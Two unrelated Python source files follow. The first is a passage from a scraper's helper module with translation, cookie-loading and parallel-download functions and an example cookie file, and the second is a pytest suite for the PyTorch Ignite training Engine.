target_language: str = "zh_cn",
engine: str = "google-free",
app_id: str = "",
key: str = "",
delay: int = 0,
):
trans_result = ""
# 中文句子如果包含&等符号会被谷歌翻译截断损失内容,而且中文翻译到中文也没有意义,故而忽略,只翻译带有日语假名的
if not is_japanese(src):
return src
if engine == "google-free":
gsite = config.getInstance().get_translate_service_site()
if not re.match('^translate\.google\.(com|com\.\w{2}|\w{2})$', gsite):
gsite = 'translate.google.cn'
url = (
f"https://{gsite}/translate_a/single?client=gtx&dt=t&dj=1&ie=UTF-8&sl=auto&tl={target_language}&q={src}"
)
result = get_html(url=url, return_type="object")
if not result.ok:
print('[-]Google-free translate web API calling failed.')
return ''
translate_list = [i["trans"] for i in result.json()["sentences"]]
trans_result = trans_result.join(translate_list)
elif engine == "azure":
url = "https://api.cognitive.microsofttranslator.com/translate?api-version=3.0&to=" + target_language
headers = {
'Ocp-Apim-Subscription-Key': key,
'Ocp-Apim-Subscription-Region': "global",
'Content-type': 'application/json',
'X-ClientTraceId': str(uuid.uuid4())
}
body = json.dumps([{'text': src}])
result = post_html(url=url, query=body, headers=headers)
translate_list = [i["text"] for i in result.json()[0]["translations"]]
trans_result = trans_result.join(translate_list)
else:
raise ValueError("Non-existent translation engine")
time.sleep(delay)
return trans_result
# 从浏览器中导出网站登录验证信息的cookies,能够以会员方式打开游客无法访问到的页面
# 示例: FC2-755670 url https://javdb9.com/v/vO8Mn
# json 文件格式
# 文件名: 站点名.json,示例 javdb9.json
# 内容(文件编码:UTF-8):
'''
{
"over18":"1",
"redirect_to":"%2Fv%2FvO8Mn",
"remember_me_token":"cbJdeaFpbHMiOnsibWVzc2FnZSI6IklrNVJjbTAzZFVSRVlVaEtPWEpUVFhOVU0yNXhJZz09IiwiZXhwIjoiMjAyMS0wNS0xNVQxMzoyODoxNy4wMDBaIiwicHVyIjoiY29va2llLnJlbWVtYmVyX21lX3Rva2VuIn19--a7131611e844cf75f9db4cd411b635889bff3fe3",
"_jdb_session":"asddefqfwfwwrfdsdaAmqKj1%2FvOrDQP4b7h%2BvGp7brvIShi2Y%2FHBUr%2BklApk06TfhBOK3g5gRImZzoi49GINH%2FK49o3W%2FX64ugBiUAcudN9b27Mg6Ohu%2Bx9Z7A4bbqmqCt7XR%2Bao8PRuOjMcdDG5czoYHJCPIPZQFU28Gd7Awc2jc5FM5CoIgSRyaYDy9ulTO7DlavxoNL%2F6OFEL%2FyaA6XUYTB2Gs1kpPiUDqwi854mo5%2FrNxMhTeBK%2BjXciazMtN5KlE5JIOfiWAjNrnx7SV3Hj%2FqPNxRxXFQyEwHr5TZa0Vk1%2FjbwWQ0wcIFfh%2FMLwwqKydAh%2FLndc%2Bmdv3e%2FJ%2BiL2--xhqYnMyVRlxJajdN--u7nl0M7Oe7tZtPd4kIaEbg%3D%3D",
"locale":"zh",
"__cfduid":"dee27116d98c432a5cabc1fe0e7c2f3c91620479752",
"theme":"auto"
}
'''
# 从网站登录后,通过浏览器插件(CookieBro或EdittThisCookie)或者直接在地址栏网站链接信息处都可以复制或者导出cookie内容,
# 并填写到以上json文件的相应字段中
def load_cookies(filename):
filename = os.path.basename(filename)
if not len(filename):
return None, None
path_search_order = (
Path.cwd() / filename,
Path.home() / filename,
Path.home() / f".mdc/{filename}",
Path.home() / f".local/share/mdc/{filename}"
)
cookies_filename = None
try:
for p in path_search_order:
if p.is_file():
cookies_filename = str(p.resolve())
break
if not cookies_filename:
return None, None
return json.load(open(cookies_filename)), cookies_filename
except:
return None, None
# 文件修改时间距此时的天数
def file_modification_days(filename) -> int:
mfile = Path(filename)
if not mfile.is_file():
return 9999
mtime = int(mfile.stat().st_mtime)
now = int(time.time())
days = int((now - mtime) / (24 * 60 * 60))
if days < 0:
return 9999
return days
def file_not_exist_or_empty(filepath) -> bool:
return not os.path.isfile(filepath) or os.path.getsize(filepath) == 0
# 日语简单检测
def is_japanese(s) -> bool:
return bool(re.search(r'[\u3040-\u309F\u30A0-\u30FF\uFF66-\uFF9F]', s, re.UNICODE))
# Usage: python ./ADC_function.py https://cn.bing.com/
if __name__ == "__main__":
import sys, timeit
from http.client import HTTPConnection
def benchmark(t, url):
print(f"HTTP GET Benchmark times:{t} url:{url}")
tm = timeit.timeit(f"_ = session1.get('{url}')",
"from __main__ import get_html_session;session1=get_html_session()",
number=t)
print(f' *{tm:>10.5f}s get_html_session() Keep-Alive enable')
tm = timeit.timeit(f"_ = scraper1.get('{url}')",
"from __main__ import get_html_by_scraper;scraper1=get_html_by_scraper()",
number=t)
print(f' *{tm:>10.5f}s get_html_by_scraper() Keep-Alive enable')
tm = timeit.timeit(f"_ = browser1.open('{url}')",
"from __main__ import get_html_by_browser;browser1=get_html_by_browser()",
number=t)
print(f' *{tm:>10.5f}s get_html_by_browser() Keep-Alive enable')
tm = timeit.timeit(f"_ = get_html('{url}')",
"from __main__ import get_html",
number=t)
print(f' *{tm:>10.5f}s get_html()')
t = 100
#url = "https://www.189.cn/"
url = "http://www.chinaunicom.com"
HTTPConnection.debuglevel = 1
s = get_html_session()
_ = s.get(url)
HTTPConnection.debuglevel = 0
if len(sys.argv)>1:
url = sys.argv[1]
benchmark(t, url)
def download_file_with_filename(url, filename, path):
conf = config.getInstance()
configProxy = conf.proxy()
for i in range(configProxy.retry):
try:
if configProxy.enable:
if not os.path.exists(path):
try:
os.makedirs(path)
except:
print(f"[-]Fatal error! Can not make folder '{path}'")
sys.exit(0)
proxies = configProxy.proxies()
headers = {
'User-Agent': G_USER_AGENT}
r = requests.get(url, headers=headers, timeout=configProxy.timeout, proxies=proxies)
if r == '':
print('[-]Movie Download Data not found!')
return
with open(os.path.join(path, filename), "wb") as code:
code.write(r.content)
return
else:
if not os.path.exists(path):
try:
os.makedirs(path)
except:
print(f"[-]Fatal error! Can not make folder '{path}'")
sys.exit(0)
headers = {
'User-Agent': G_USER_AGENT}
r = requests.get(url, timeout=configProxy.timeout, headers=headers)
if r == '':
print('[-]Movie Download Data not found!')
return
with open(os.path.join(path, filename), "wb") as code:
code.write(r.content)
return
except requests.exceptions.RequestException:
i += 1
print('[-]Download : Connect retry ' + str(i) + '/' + str(configProxy.retry))
except requests.exceptions.ConnectionError:
i += 1
print('[-]Download : Connect retry ' + str(i) + '/' + str(configProxy.retry))
except requests.exceptions.ProxyError:
i += 1
print('[-]Download : Connect retry ' + str(i) + '/' + str(configProxy.retry))
except requests.exceptions.ConnectTimeout:
i += 1
print('[-]Download : Connect retry ' + str(i) + '/' + str(configProxy.retry))
except IOError:
raise ValueError(f"[-]Create Directory '{path}' failed!")
return
print('[-]Connect Failed! Please check your Proxy or Network!')
raise ValueError('[-]Connect Failed! Please check your Proxy or Network!')
return
def download_one_file(args):
def _inner(url: str, save_path: Path):
filebytes = get_html(url, return_type='content')
if isinstance(filebytes, bytes) and len(filebytes):
if len(filebytes) == save_path.open('wb').write(filebytes):
return str(save_path)
return _inner(*args)
'''用法示例: 2线程同时下载两个不同文件,并保存到不同路径,路径目录可未创建,但需要具备对目标目录和文件的写权限
parallel_download_files([
('https://site1/img/p1.jpg', 'C:/temp/img/p1.jpg'),
('https://site2/cover/n1.xml', 'C:/tmp/cover/n1.xml')
])
'''
# dn_list 可以是 tuple或者list: ((url1, save_fullpath1),(url2, save_fullpath2),)
# parallel: 并行下载的线程池线程数,为0则由函数自己决定
def parallel_download_files(dn_list, parallel: int = 0):
mp_args = []
for url, fullpath in dn_list:
if url and isinstance(url, str) and url.startswith('http') and fullpath and isinstance(fullpath, (str, Path)) and len(str(fullpath)):
fullpath = Path(fullpath)
fullpath.parent.mkdir(parents=True, exist_ok=True)
mp_args.append((url, fullpath))
if not len(mp_args):
return []
if not isinstance(parallel, int) or parallel not in range(1,200):
parallel = min(5, len(mp_args))
with ThreadPoolExecutor(parallel) as pool:
results = list(pool.map(download_one_file, mp_args))
return results
def delete_all_elements_in_list(string,lists):
new_lists = []
for i in lists:
if i != string:
new_lists.append(i)
return new_lists
|
the-stack_0_19889 | import os
import time
from unittest.mock import call, MagicMock, Mock
import numpy as np
import pytest
import torch
import ignite.distributed as idist
from ignite.engine import Engine, Events, State
from ignite.engine.deterministic import keep_random_state
from ignite.metrics import Average
from tests.ignite.engine import BatchChecker, EpochCounter, IterationCounter
def test_terminate():
engine = Engine(lambda e, b: 1)
assert not engine.should_terminate
engine.terminate()
assert engine.should_terminate
def test_invalid_process_raises_with_invalid_signature():
with pytest.raises(ValueError, match=r"Engine must be given a processing function in order to run"):
Engine(None)
with pytest.raises(ValueError, match=r"Error adding .+ takes parameters .+ but will be called with"):
Engine(lambda: None)
with pytest.raises(ValueError, match=r"Error adding .+ takes parameters .+ but will be called with"):
Engine(lambda batch: None)
with pytest.raises(ValueError, match=r"Error adding .+ takes parameters .+ but will be called with"):
Engine(lambda engine, batch, extra_arg: None)
def test_invalid_input_data():
engine = Engine(lambda e, b: None)
def data():
pass
with pytest.raises(TypeError, match=r"Argument data should be iterable"):
engine.run(data)
@pytest.mark.parametrize("data", [None, [1, 2]])
def test_current_epoch_counter_increases_every_epoch(data):
engine = Engine(MagicMock(return_value=1))
max_epochs = 5
counter = EpochCounter()
engine.add_event_handler(Events.EPOCH_STARTED, counter)
state = engine.run(data, max_epochs=max_epochs, epoch_length=2)
assert state.epoch == max_epochs
counter.current_epoch_count = 1
state = engine.run(data, max_epochs=max_epochs, epoch_length=2)
assert state.epoch == max_epochs
@pytest.mark.parametrize("data", [None, [1, 2, 3]])
def test_current_iteration_counter_increases_every_iteration(data):
engine = Engine(MagicMock(return_value=1))
max_epochs = 5
counter = IterationCounter()
engine.add_event_handler(Events.ITERATION_STARTED, counter)
epoch_length = 3
state = engine.run(data, max_epochs=max_epochs, epoch_length=epoch_length)
assert state.iteration == max_epochs * epoch_length
counter.current_iteration_count = 1
state = engine.run(data, max_epochs=max_epochs, epoch_length=epoch_length)
assert state.iteration == max_epochs * epoch_length
def test_stopping_criterion_is_max_epochs():
engine = Engine(MagicMock(return_value=1))
max_epochs = 5
state = engine.run([1], max_epochs=max_epochs)
assert state.epoch == max_epochs
@pytest.mark.parametrize("data", [None, [1, 2]])
def test_terminate_at_end_of_epoch_stops_run(data):
max_epochs = 5
last_epoch_to_run = 3
engine = Engine(MagicMock(return_value=1))
def end_of_epoch_handler(engine):
if engine.state.epoch == last_epoch_to_run:
engine.terminate()
engine.add_event_handler(Events.EPOCH_COMPLETED, end_of_epoch_handler)
assert not engine.should_terminate
state = engine.run(data, max_epochs=max_epochs, epoch_length=2)
assert state.epoch == last_epoch_to_run
assert engine.should_terminate
@pytest.mark.parametrize("data", [None, [1, 2, 3]])
def test_terminate_at_start_of_epoch_stops_run_after_completing_iteration(data):
max_epochs = 5
epoch_to_terminate_on = 3
epoch_length = 3
engine = Engine(MagicMock(return_value=1))
def start_of_epoch_handler(engine):
if engine.state.epoch == epoch_to_terminate_on:
engine.terminate()
engine.add_event_handler(Events.EPOCH_STARTED, start_of_epoch_handler)
assert not engine.should_terminate
state = engine.run(data, max_epochs=max_epochs, epoch_length=epoch_length)
# epoch is not completed so counter is not incremented
assert state.epoch == epoch_to_terminate_on
assert engine.should_terminate
# completes first iteration
assert state.iteration == ((epoch_to_terminate_on - 1) * epoch_length) + 1
@pytest.mark.parametrize("data", [None, list(range(10))])
def test_terminate_stops_run_mid_epoch(data):
num_iterations_per_epoch = len(data) if data is not None else 10
iteration_to_stop = num_iterations_per_epoch + 3
engine = Engine(MagicMock(return_value=1))
def start_of_iteration_handler(engine):
if engine.state.iteration == iteration_to_stop:
engine.terminate()
engine.add_event_handler(Events.ITERATION_STARTED, start_of_iteration_handler)
state = engine.run(data, max_epochs=3, epoch_length=num_iterations_per_epoch)
# completes the iteration but doesn't increment counter (this happens just before a new iteration starts)
assert state.iteration == iteration_to_stop
assert state.epoch == np.ceil(iteration_to_stop / num_iterations_per_epoch) # it starts from 0
@pytest.mark.parametrize("data", [None, list(range(10))])
def test_terminate_epoch_stops_mid_epoch(data):
num_iterations_per_epoch = len(data) if data is not None else 10
iteration_to_stop = num_iterations_per_epoch + 4
engine = Engine(MagicMock(return_value=1))
def start_of_iteration_handler(engine):
if engine.state.iteration == iteration_to_stop:
engine.terminate_epoch()
max_epochs = 3
engine.add_event_handler(Events.ITERATION_STARTED, start_of_iteration_handler)
state = engine.run(data, max_epochs=max_epochs, epoch_length=num_iterations_per_epoch)
# completes the iteration but doesn't increment counter (this happens just before a new iteration starts)
true_value = num_iterations_per_epoch * (max_epochs - 1) + iteration_to_stop % num_iterations_per_epoch
assert state.iteration == true_value
def _create_mock_data_loader(epochs, batches_per_epoch):
batches = [MagicMock()] * batches_per_epoch
data_loader_manager = MagicMock()
batch_iterators = [iter(batches) for _ in range(epochs)]
data_loader_manager.__iter__.side_effect = batch_iterators
data_loader_manager.__len__.return_value = batches_per_epoch
return data_loader_manager
@pytest.mark.parametrize("data", [None, "mock_data_loader"])
def test_iteration_events_are_fired(data):
max_epochs = 5
num_batches = epoch_length = 3
if isinstance(data, str) and data == "mock_data_loader":
data = _create_mock_data_loader(max_epochs, num_batches)
epoch_length = None
engine = Engine(MagicMock(return_value=1))
mock_manager = Mock()
iteration_started = Mock()
engine.add_event_handler(Events.ITERATION_STARTED, iteration_started)
iteration_complete = Mock()
engine.add_event_handler(Events.ITERATION_COMPLETED, iteration_complete)
mock_manager.attach_mock(iteration_started, "iteration_started")
mock_manager.attach_mock(iteration_complete, "iteration_complete")
engine.run(data, max_epochs=max_epochs, epoch_length=epoch_length)
assert iteration_started.call_count == num_batches * max_epochs
assert iteration_complete.call_count == num_batches * max_epochs
expected_calls = []
for _ in range(max_epochs * num_batches):
expected_calls.append(call.iteration_started(engine))
expected_calls.append(call.iteration_complete(engine))
assert mock_manager.mock_calls == expected_calls
@pytest.mark.parametrize("data", [None, [1, 2]])
def test_last_event_name(data):
engine = Engine(MagicMock(return_value=1))
assert engine.last_event_name is None
@engine.on(Events.STARTED)
def _(_engine):
assert _engine.last_event_name == Events.STARTED
@engine.on(Events.EPOCH_STARTED)
def _(_engine):
assert _engine.last_event_name == Events.EPOCH_STARTED
@engine.on(Events.ITERATION_STARTED)
def _(_engine):
assert _engine.last_event_name == Events.ITERATION_STARTED
@engine.on(Events.ITERATION_COMPLETED)
def _(_engine):
assert _engine.last_event_name == Events.ITERATION_COMPLETED
@engine.on(Events.EPOCH_COMPLETED)
def _(_engine):
assert _engine.last_event_name == Events.EPOCH_COMPLETED
epoch_length = 2 if data is None else None
engine.run(data, epoch_length=epoch_length)
assert engine.last_event_name == Events.COMPLETED
def test_reset_should_terminate():
def update_fn(engine, batch):
pass
engine = Engine(update_fn)
@engine.on(Events.ITERATION_COMPLETED)
def terminate_on_iteration_10(engine):
if engine.state.iteration == 10:
engine.terminate()
engine.run([0] * 20)
assert engine.state.iteration == 10
engine.run([0] * 20)
assert engine.state.iteration == 10
def test_batch_values():
def _test(data):
# This test check the content passed to update function
counter = [0]
num_iters = len(data)
def update_fn(_, batch):
assert batch == data[counter[0] % num_iters]
counter[0] += 1
engine = Engine(update_fn)
engine.run(data, max_epochs=10)
data = torch.randint(0, 1000, size=(256,))
_test(data)
def test_state_repr():
data = [0, 1, 2, 3, 4, 5]
max_epochs = 1
metrics = {"accuracy": Mock()}
state = State(dataloader=data, max_epochs=max_epochs, metrics=metrics)
s = repr(state)
assert "iteration" in s
assert "epoch" in s
assert "max_epochs: 1" in s
assert "dataloader" in s
assert "metrics" in s
assert "output" in s
assert "batch" in s
def test_alter_batch():
small_shape = (1, 2, 2)
large_shape = (1, 3, 3)
small_loader = torch.randint(0, 256, size=(30,) + small_shape)
large_loader = torch.randint(0, 256, size=(20,) + large_shape)
switch_iteration = 50
def should_take_large_img(i):
return i >= switch_iteration
def update_fn(engine, batch):
i = engine.state.iteration
if i < switch_iteration:
assert batch.shape == small_shape
assert (small_loader[(i - 1) % len(small_loader), ...] == batch).all()
else:
assert batch.shape == large_shape
assert (large_loader[(i - switch_iteration) % len(large_loader), ...] == batch).all()
trainer = Engine(update_fn)
def cycle(seq):
while True:
for i in seq:
yield i
small_loader_iter = cycle(small_loader)
large_loader_iter = cycle(large_loader)
@trainer.on(Events.ITERATION_STARTED)
def choose_batch(engine):
i = engine.state.iteration
if should_take_large_img(i):
batch = next(large_loader_iter)
else:
batch = next(small_loader_iter)
engine.state.batch = batch
num_epochs = 5
num_iters = 25
data = range(num_iters)
trainer.run(data, num_epochs)
def test__is_done():
state = State(iteration=10, epoch=1, max_epochs=100, epoch_length=100)
assert not Engine._is_done(state)
state = State(iteration=1000, max_epochs=10, epoch_length=100)
assert Engine._is_done(state)
def test__setup_engine():
engine = Engine(lambda e, b: 1)
engine.state = State(iteration=10, epoch=1, max_epochs=100, epoch_length=100)
data = list(range(100))
engine.state.dataloader = data
engine._setup_engine()
assert len(engine._init_iter) == 1 and engine._init_iter[0] == 10
def test_run_asserts():
engine = Engine(lambda e, b: 1)
with pytest.raises(ValueError, match=r"Input data has zero size. Please provide non-empty data"):
engine.run([])
def test_state_get_event_attrib_value():
state = State()
state.iteration = 10
state.epoch = 9
e = Events.ITERATION_STARTED
assert state.get_event_attrib_value(e) == state.iteration
e = Events.ITERATION_COMPLETED
assert state.get_event_attrib_value(e) == state.iteration
e = Events.EPOCH_STARTED
assert state.get_event_attrib_value(e) == state.epoch
e = Events.EPOCH_COMPLETED
assert state.get_event_attrib_value(e) == state.epoch
e = Events.STARTED
assert state.get_event_attrib_value(e) == state.epoch
e = Events.COMPLETED
assert state.get_event_attrib_value(e) == state.epoch
e = Events.ITERATION_STARTED(every=10)
assert state.get_event_attrib_value(e) == state.iteration
e = Events.ITERATION_COMPLETED(every=10)
assert state.get_event_attrib_value(e) == state.iteration
e = Events.EPOCH_STARTED(once=5)
assert state.get_event_attrib_value(e) == state.epoch
e = Events.EPOCH_COMPLETED(once=5)
assert state.get_event_attrib_value(e) == state.epoch
def test_time_stored_in_state():
def _test(data, max_epochs, epoch_length):
sleep_time = 0.01
extra_sleep_time = 0.1
engine = Engine(lambda e, b: time.sleep(sleep_time))
@engine.on(Events.EPOCH_COMPLETED)
def check_epoch_time():
assert engine.state.times[Events.EPOCH_COMPLETED.name] >= sleep_time * epoch_length
time.sleep(extra_sleep_time)
@engine.on(Events.COMPLETED)
def check_completed_time():
assert (
engine.state.times[Events.COMPLETED.name] >= (sleep_time * epoch_length + extra_sleep_time) * max_epochs
)
time.sleep(extra_sleep_time)
engine.run(data, max_epochs=max_epochs, epoch_length=epoch_length)
assert engine.state.times[Events.EPOCH_COMPLETED.name] >= sleep_time * epoch_length + extra_sleep_time
assert (
engine.state.times[Events.COMPLETED.name]
>= (sleep_time * epoch_length + extra_sleep_time) * max_epochs + extra_sleep_time
)
_test(list(range(100)), max_epochs=2, epoch_length=100)
_test(list(range(200)), max_epochs=2, epoch_length=100)
_test(list(range(200)), max_epochs=5, epoch_length=100)
def _test_check_triggered_events(data, max_epochs, epoch_length, exp_iter_stops=None):
engine = Engine(lambda e, b: 1)
events = [
Events.STARTED,
Events.EPOCH_STARTED,
Events.ITERATION_STARTED,
Events.ITERATION_COMPLETED,
Events.EPOCH_COMPLETED,
Events.COMPLETED,
Events.GET_BATCH_STARTED,
Events.GET_BATCH_COMPLETED,
Events.DATALOADER_STOP_ITERATION,
]
handlers = {e: MagicMock() for e in events}
for e, handler in handlers.items():
engine.add_event_handler(e, handler)
engine.run(data, max_epochs=max_epochs, epoch_length=epoch_length)
expected_num_calls = {
Events.STARTED: 1,
Events.COMPLETED: 1,
Events.EPOCH_STARTED: max_epochs,
Events.EPOCH_COMPLETED: max_epochs,
Events.ITERATION_STARTED: max_epochs * epoch_length,
Events.ITERATION_COMPLETED: max_epochs * epoch_length,
Events.GET_BATCH_STARTED: max_epochs * epoch_length,
Events.GET_BATCH_COMPLETED: max_epochs * epoch_length,
Events.DATALOADER_STOP_ITERATION: (max_epochs - 1) if exp_iter_stops is None else exp_iter_stops,
}
for n, handler in handlers.items():
assert handler.call_count == expected_num_calls[n], f"{n}: {handler.call_count} vs {expected_num_calls[n]}"
def _test_run_check_triggered_events():
# tests issue https://github.com/pytorch/ignite/issues/818
_test_check_triggered_events(list(range(10)), max_epochs=4, epoch_length=10)
_test_check_triggered_events(list(range(100)), max_epochs=5, epoch_length=100)
_test_check_triggered_events(list(range(100)), max_epochs=5, epoch_length=50, exp_iter_stops=50 * 5 // 100)
_test_check_triggered_events(list(range(100)), max_epochs=5, epoch_length=150, exp_iter_stops=150 * 5 // 100)
_test_check_triggered_events(None, max_epochs=5, epoch_length=150)
def test_run_check_triggered_events_list():
_test_run_check_triggered_events()
def _test_run_check_triggered_events_on_iterator():
def infinite_data_iterator():
while True:
for i in range(100):
yield i
_test_check_triggered_events(infinite_data_iterator(), max_epochs=5, epoch_length=100, exp_iter_stops=0)
_test_check_triggered_events(infinite_data_iterator(), max_epochs=5, epoch_length=50, exp_iter_stops=0)
_test_check_triggered_events(infinite_data_iterator(), max_epochs=5, epoch_length=150, exp_iter_stops=0)
def limited_data_iterator():
for i in range(100):
yield i
_test_check_triggered_events(limited_data_iterator(), max_epochs=1, epoch_length=100, exp_iter_stops=0)
_test_check_triggered_events(limited_data_iterator(), max_epochs=10, epoch_length=10, exp_iter_stops=0)
# These tests will fail
with pytest.raises(AssertionError):
with pytest.warns(UserWarning, match=r"Data iterator can not provide data anymore"):
_test_check_triggered_events(limited_data_iterator(), max_epochs=3, epoch_length=100)
with pytest.raises(AssertionError):
with pytest.warns(UserWarning, match=r"Data iterator can not provide data anymore"):
_test_check_triggered_events(limited_data_iterator(), max_epochs=3, epoch_length=75)
with pytest.raises(AssertionError):
with pytest.warns(UserWarning, match=r"Data iterator can not provide data anymore"):
_test_check_triggered_events(limited_data_iterator(), max_epochs=1, epoch_length=101)
def test_run_check_triggered_events_on_iterator():
_test_run_check_triggered_events_on_iterator()
@pytest.mark.distributed
@pytest.mark.skipif(not idist.has_native_dist_support, reason="Skip if no native dist support")
@pytest.mark.skipif(torch.cuda.device_count() < 1, reason="Skip if no GPU")
def test_distrib_nccl_gpu(distributed_context_single_node_nccl):
_test_run_check_triggered_events_on_iterator()
_test_run_check_triggered_events()
@pytest.mark.distributed
@pytest.mark.skipif(not idist.has_native_dist_support, reason="Skip if no native dist support")
def test_distrib_gloo_cpu_or_gpu(distributed_context_single_node_gloo):
_test_run_check_triggered_events_on_iterator()
_test_run_check_triggered_events()
@pytest.mark.multinode_distributed
@pytest.mark.skipif(not idist.has_native_dist_support, reason="Skip if no native dist support")
@pytest.mark.skipif("MULTINODE_DISTRIB" not in os.environ, reason="Skip if not multi-node distributed")
def test_multinode_distrib_gloo_cpu_or_gpu(distributed_context_multi_node_gloo):
_test_run_check_triggered_events_on_iterator()
_test_run_check_triggered_events()
@pytest.mark.multinode_distributed
@pytest.mark.skipif(not idist.has_native_dist_support, reason="Skip if no native dist support")
@pytest.mark.skipif("GPU_MULTINODE_DISTRIB" not in os.environ, reason="Skip if not multi-node distributed")
def test_multinode_distrib_nccl_gpu(distributed_context_multi_node_nccl):
_test_run_check_triggered_events_on_iterator()
_test_run_check_triggered_events()
def test_engine_random_state():
def random_data_generator():
while True:
yield torch.randint(0, 100, size=(5,))
def sum_data(_, batch):
result = torch.sum(batch)
return result
def get_engine():
engine = Engine(sum_data)
average = Average()
average.attach(engine, "average")
return engine
torch.manual_seed(34)
engine = get_engine()
state1 = engine.run(random_data_generator(), max_epochs=2, epoch_length=2)
torch.manual_seed(34)
engine = get_engine()
state2 = engine.run(random_data_generator(), max_epochs=2, epoch_length=2)
torch.manual_seed(42)
engine = get_engine()
state3 = engine.run(random_data_generator(), max_epochs=2, epoch_length=2)
assert state1.metrics["average"] == pytest.approx(state2.metrics["average"])
assert state1.metrics["average"] != pytest.approx(state3.metrics["average"])
assert state2.metrics["average"] != pytest.approx(state3.metrics["average"])
def test_altered_random_state():
# tests issue https://github.com/pytorch/ignite/issues/795
size = 1
def random_train_data_generator(size):
while True:
yield torch.randint(0, 100, size=(size,))
def random_val_data_generator(size):
while True:
yield torch.randint(0, 100, size=(size,)) + 100
train_only_batches = []
def train_fn(_, batch):
train_only_batches.append(batch[0].item())
torch.manual_seed(1)
epoch_length = 6
trainer = Engine(train_fn)
trainer.run(random_train_data_generator(size), max_epochs=4, epoch_length=epoch_length)
def val_fn(_1, _2):
pass
evaluator = Engine(val_fn)
train_batches = []
def train_fn2(_, batch):
train_batches.append(batch[0].item())
trainer = Engine(train_fn2)
@trainer.on(Events.EPOCH_COMPLETED)
@keep_random_state
def run_evaluation(_):
evaluator.run(random_val_data_generator(size), epoch_length=4)
torch.manual_seed(1)
trainer.run(random_train_data_generator(size), max_epochs=4, epoch_length=epoch_length)
for i in range(epoch_length):
assert train_batches[epoch_length + i] != train_batches[2 * epoch_length + i]
assert train_batches[i] == train_only_batches[i]
def test_engine_with_dataloader_no_auto_batching():
# tests https://github.com/pytorch/ignite/issues/941
from torch.utils.data import BatchSampler, DataLoader, RandomSampler
data = torch.rand(64, 4, 10)
data_loader = DataLoader(
data, batch_size=None, sampler=BatchSampler(RandomSampler(data), batch_size=8, drop_last=True)
)
counter = [0]
def foo(e, b):
counter[0] += 1
engine = Engine(foo)
engine.run(data_loader, epoch_length=10, max_epochs=5)
assert counter[0] == 50
def test_run_once_finite_iterator_no_epoch_length():
# FR: https://github.com/pytorch/ignite/issues/871
unknown_size = 11
def finite_unk_size_data_iter():
for i in range(unknown_size):
yield i
bc = BatchChecker(data=list(range(unknown_size)))
engine = Engine(lambda e, b: bc.check(b))
completed_handler = MagicMock()
engine.add_event_handler(Events.COMPLETED, completed_handler)
data_iter = finite_unk_size_data_iter()
engine.run(data_iter)
assert engine.state.epoch == 1
assert engine.state.iteration == unknown_size
assert completed_handler.call_count == 1
def test_run_finite_iterator_no_epoch_length():
# FR: https://github.com/pytorch/ignite/issues/871
unknown_size = 11
def finite_unk_size_data_iter():
for i in range(unknown_size):
yield i
bc = BatchChecker(data=list(range(unknown_size)))
engine = Engine(lambda e, b: bc.check(b))
@engine.on(Events.DATALOADER_STOP_ITERATION)
def restart_iter():
engine.state.dataloader = finite_unk_size_data_iter()
data_iter = finite_unk_size_data_iter()
engine.run(data_iter, max_epochs=5)
assert engine.state.epoch == 5
assert engine.state.iteration == unknown_size * 5
def test_run_finite_iterator_no_epoch_length_2():
# FR: https://github.com/pytorch/ignite/issues/871
known_size = 11
def finite_size_data_iter(size):
for i in range(size):
yield i
bc = BatchChecker(data=list(range(known_size)))
engine = Engine(lambda e, b: bc.check(b))
@engine.on(Events.ITERATION_COMPLETED(every=known_size))
def restart_iter():
engine.state.dataloader = finite_size_data_iter(known_size)
data_iter = finite_size_data_iter(known_size)
engine.run(data_iter, max_epochs=5)
assert engine.state.epoch == 5
assert engine.state.iteration == known_size * 5
def test_faq_inf_iterator_with_epoch_length():
# Code snippet from FAQ
# import torch
torch.manual_seed(12)
def infinite_iterator(batch_size):
while True:
batch = torch.rand(batch_size, 3, 32, 32)
yield batch
def train_step(trainer, batch):
# ...
s = trainer.state
print(f"{s.epoch}/{s.max_epochs} : {s.iteration} - {batch.norm():.3f}")
trainer = Engine(train_step)
# We need to specify epoch_length to define the epoch
trainer.run(infinite_iterator(4), epoch_length=5, max_epochs=3)
assert trainer.state.epoch == 3
assert trainer.state.iteration == 3 * 5
def test_faq_inf_iterator_no_epoch_length():
# Code snippet from FAQ
# import torch
torch.manual_seed(12)
def infinite_iterator(batch_size):
while True:
batch = torch.rand(batch_size, 3, 32, 32)
yield batch
def train_step(trainer, batch):
# ...
s = trainer.state
print(f"{s.epoch}/{s.max_epochs} : {s.iteration} - {batch.norm():.3f}")
trainer = Engine(train_step)
@trainer.on(Events.ITERATION_COMPLETED(once=15))
def stop_training():
trainer.terminate()
trainer.run(infinite_iterator(4))
assert trainer.state.epoch == 1
assert trainer.state.iteration == 15
def test_faq_fin_iterator_unknw_size():
# Code snippet from FAQ
# import torch
torch.manual_seed(12)
def finite_unk_size_data_iter():
for i in range(11):
yield i
def train_step(trainer, batch):
# ...
s = trainer.state
print(f"{s.epoch}/{s.max_epochs} : {s.iteration} - {batch:.3f}")
trainer = Engine(train_step)
@trainer.on(Events.DATALOADER_STOP_ITERATION)
def restart_iter():
trainer.state.dataloader = finite_unk_size_data_iter()
data_iter = finite_unk_size_data_iter()
trainer.run(data_iter, max_epochs=5)
assert trainer.state.epoch == 5
assert trainer.state.iteration == 5 * 11
# Code snippet from FAQ
# import torch
torch.manual_seed(12)
def finite_unk_size_data_iter():
for i in range(11):
yield i
def val_step(evaluator, batch):
# ...
s = evaluator.state
print(f"{s.epoch}/{s.max_epochs} : {s.iteration} - {batch:.3f}")
evaluator = Engine(val_step)
data_iter = finite_unk_size_data_iter()
evaluator.run(data_iter)
assert evaluator.state.epoch == 1
assert evaluator.state.iteration == 1 * 11
def test_faq_fin_iterator():
# Code snippet from FAQ
# import torch
torch.manual_seed(12)
size = 11
def finite_size_data_iter(size):
for i in range(size):
yield i
def train_step(trainer, batch):
# ...
s = trainer.state
print(f"{s.epoch}/{s.max_epochs} : {s.iteration} - {batch:.3f}")
trainer = Engine(train_step)
@trainer.on(Events.ITERATION_COMPLETED(every=size))
def restart_iter():
trainer.state.dataloader = finite_size_data_iter(size)
data_iter = finite_size_data_iter(size)
trainer.run(data_iter, max_epochs=5)
assert trainer.state.epoch == 5
assert trainer.state.iteration == 5 * size
# Code snippet from FAQ
# import torch
torch.manual_seed(12)
size = 11
def finite_size_data_iter(size):
for i in range(size):
yield i
def val_step(evaluator, batch):
# ...
s = evaluator.state
print(f"{s.epoch}/{s.max_epochs} : {s.iteration} - {batch:.3f}")
evaluator = Engine(val_step)
data_iter = finite_size_data_iter(size)
evaluator.run(data_iter)
